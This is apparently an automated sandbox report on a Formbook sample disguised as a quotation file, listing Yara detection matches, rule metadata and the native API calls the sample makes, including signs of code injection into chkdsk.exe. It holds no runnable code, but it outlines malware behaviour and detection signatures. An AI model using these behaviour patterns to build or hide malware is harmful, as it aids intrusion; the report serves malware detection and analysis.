          Source: Yara matchFile source: 3.2.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RFQ-BCM 03122020.exe.2160000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RFQ-BCM 03122020.exe.2160000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RFQ-BCM 03122020.exe.2160000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RFQ-BCM 03122020.exe.2160000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041826D NtReadFile,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_004182EB NtClose,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041839A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BBB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BBA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BBAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9560 NtWriteFile,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BBA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BBA770 NtOpenThread,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_004182F0 NtClose,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041826D NtReadFile,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_004182EB NtClose,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041839A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BCAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BCA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BCA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BCB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BCA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_001381C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_00138270 NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_001382F0 NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_001383A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_0013826D NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_001382EB NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_0013839A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_004046CA
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_00405FA8
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_73431A98
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00401209
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041CAD7
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041CADA
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041BB43
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00408C60
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041C4FA
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041CF74
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041B7F3
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA20A0
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8B090
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C428EC
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C420A8
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A830
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C31002
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C4E824
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B94120
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7F900
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C422AE
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C2FA2B
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAEBB0
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C3DBD2
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C303DA
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C223E3
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAABD8
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C1CB4F
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C42B28
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9AB40
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34496
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C3D466
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8841F
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B477
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C425DD
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA2581
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C32D82
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8D5E0
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C41D55
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B70D20
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C42D07
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C42EF7
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B96E30
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C3D616
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C4DFCE
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C41FF1
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_00401030
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_00401209
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041CAD7
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041CADA
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041BB43
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_00408C60
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041C4FA
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_00402D90
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041CF74
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041B7F3
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_00402FB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C4D466
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B9841F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C525DD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB2581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B9D5E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C51D55
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B80D20
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C52D07
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C52EF7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BA6E30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C4D616
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C5DFCE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C51FF1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB20A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B9B090
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C528EC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C520A8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C41002
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C5E824
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BA4120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B8F900
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C522AE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C3FA2B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BBEBB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C4DBD2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C403DA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C52B28
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BAAB40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_0013CAD7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_0013CADA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_00128C60
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_0013C4FA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_00122D90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_0013CF74
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_00122FB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 04B8B150 appears 48 times
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: String function: 00B7B150 appears 136 times
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: String function: 0041A0A0 appears 38 times
          Source: RFQ-BCM 03122020.exe, 00000002.00000003.252302485.00000000099B6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ-BCM 03122020.exe
          Source: RFQ-BCM 03122020.exe, 00000003.00000002.305155213.0000000000A46000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs RFQ-BCM 03122020.exe
          Source: RFQ-BCM 03122020.exe, 00000003.00000002.305433553.0000000000DFF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ-BCM 03122020.exe
          Source: RFQ-BCM 03122020.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
